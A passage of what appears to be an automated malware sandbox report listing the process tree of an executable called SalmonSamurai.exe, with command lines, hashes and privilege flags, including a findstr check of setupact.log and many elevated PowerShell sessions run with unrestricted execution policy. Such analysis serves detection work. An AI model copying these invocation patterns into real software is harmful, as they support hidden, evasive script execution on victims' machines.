                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                          Start time:11:04:45
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                                                                                                                                                                          Imagebase:0x7ff6f6bb0000
                                                                                                                                                                                                                                          File size:160'143'360 bytes
                                                                                                                                                                                                                                          MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                          Start time:11:04:49
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff6f6bb0000
                                                                                                                                                                                                                                          File size:160'143'360 bytes
                                                                                                                                                                                                                                          MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
                                                                                                                                                                                                                                          Imagebase:0x7ff68ea40000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
                                                                                                                                                                                                                                          Imagebase:0x7ff774c50000
                                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                          Start time:11:05:13
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                          Start time:11:05:14
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                          Start time:11:05:26
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                          Start time:11:05:26
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                          Start time:11:05:37
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                          Start time:11:05:37
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff71e800000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                          Start time:11:05:47
                                                                                                                                                                                                                                          Start date:23/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
